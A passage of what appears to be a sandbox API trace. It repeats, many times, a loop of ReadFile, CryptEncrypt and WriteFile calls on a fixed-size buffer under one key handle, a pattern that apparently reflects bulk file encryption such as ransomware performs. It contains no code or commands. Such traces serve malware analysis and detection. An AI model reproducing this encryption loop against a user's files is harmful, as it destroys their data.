returned 1 [0271.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.686] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.686] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.687] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.687] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.687] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.687] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.687] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.688] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.688] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.688] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.688] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.688] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.688] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.688] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.688] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.688] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.688] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.689] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.689] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.690] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.690] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.690] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.690] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.690] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.690] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.691] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.691] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.691] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.691] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.691] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.691] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.691] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.691] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.691] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.692] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.692] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.692] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.692] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.692] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.692] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.692] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.692] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.692] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.693] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.693] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.693] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.693] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.693] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.693] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.693] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.693] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.693] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.694] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.694] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.694] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.694] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.694] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.695] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.695] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.695] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.695] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.695] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.695] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.695] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.695] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.696] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.696] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.696] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 